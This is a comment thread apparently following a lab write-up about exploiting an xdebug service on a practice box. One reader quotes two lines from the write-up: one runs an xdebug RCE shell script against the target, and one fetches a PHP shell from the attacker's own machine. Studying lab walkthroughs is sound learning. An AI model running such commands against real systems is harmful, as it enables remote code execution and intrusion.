Great post. When I was doing the box I never thought to use Nikto and it took me quite a while to notice that first foothold!
Lesson learned, thanks.
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Thank you very much for your writeups.
May I ask you 2 questions:
I wonder what keywords in Google you used to find this github.com link:
I tried these keywords in Google without success.
xdebug exploit shell
xdebug exploit rce
xdebug exploit repository
xdebug php exploit
..........Question 2 has 2 sub questions:
You wrote in your writeup:
./xdebug-shell.py -u http://10.10.10.83
curl -O http://miIp/shell.php
..........Is this "xdebug-shell.py" the code copied from
the IP address of my Kali Linux?
Thanks a million.
I guess the keywords to search on google were:
php debug rce
Click here to create an account.